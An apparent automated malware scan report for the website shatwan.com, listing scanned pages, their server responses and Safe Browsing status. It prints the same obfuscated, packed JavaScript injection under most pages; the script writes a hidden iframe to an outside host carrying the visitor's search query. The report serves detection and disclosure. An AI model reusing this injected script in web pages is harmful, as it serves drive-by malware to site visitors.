Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shatwan.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.shatwan.com/ | HTTP/1.1 302 Found Connection: close Date: Sun, 21 Dec 2014 11:56:34 GMT Location: http://www.shatwan.com/dr Server: nginx/1.6.2 Content-Length: 274 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shatwan.com/dr | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 21 Dec 2014 11:56:35 GMT Location: http://www.shatwan.com/dr/ Server: nginx/1.6.2 Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shatwan.com/dr/ | 200 OK Content-Length: 219561 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php?option=com_frontpage&Itemid=1 | 200 OK Content-Length: 219561 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php?option=com_content&task=view&id=40&Itemid=83 | 200 OK Content-Length: 212584 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php | 200 OK Content-Length: 219561 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php?option=com_content&task=category&ionid=22&id=67&Itemid=84 | 200 OK Content-Length: 203500 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php?option=com_docman&task=cat_view&gid=89&Itemid=86 | 200 OK Content-Length: 208223 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/components/com_docman/themes/default/js/theme.js | 200 OK Content-Length: 1007 Content-Type: application/javascript | clean |
http://www.shatwan.com/dr/index.php?option=com_docman&task=cat_view&gid=91&Itemid=86 | 200 OK Content-Length: 204899 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php?option=com_docman&task=cat_view&gid=92&Itemid=86 | 200 OK Content-Length: 206750 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php?option=com_docman&task=cat_view&gid=90&Itemid=86 | 200 OK Content-Length: 206993 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php?option=com_content&task=section&id=23&Itemid=94 | 200 OK Content-Length: 203502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php?option=com_content&task=view&id=53&Itemid=87 | 200 OK Content-Length: 212295 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php?option=com_akobook&Itemid=66 | 200 OK Content-Length: 214082 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}' Antivirus reports:
| ||
http://www.shatwan.com/dr/index.php?option=com_contact&Itemid=3 | 200 OK Content-Length: 160 Content-Type: text/html | clean |
http://www.shatwan.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shatwan.com
Result:
GET / HTTP/1.1
Host: shatwan.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: shatwan.com
Referer: http://www.google.com/search?q=shatwan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: shatwan.com
Referer: http://www.google.com/search?q=shatwan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.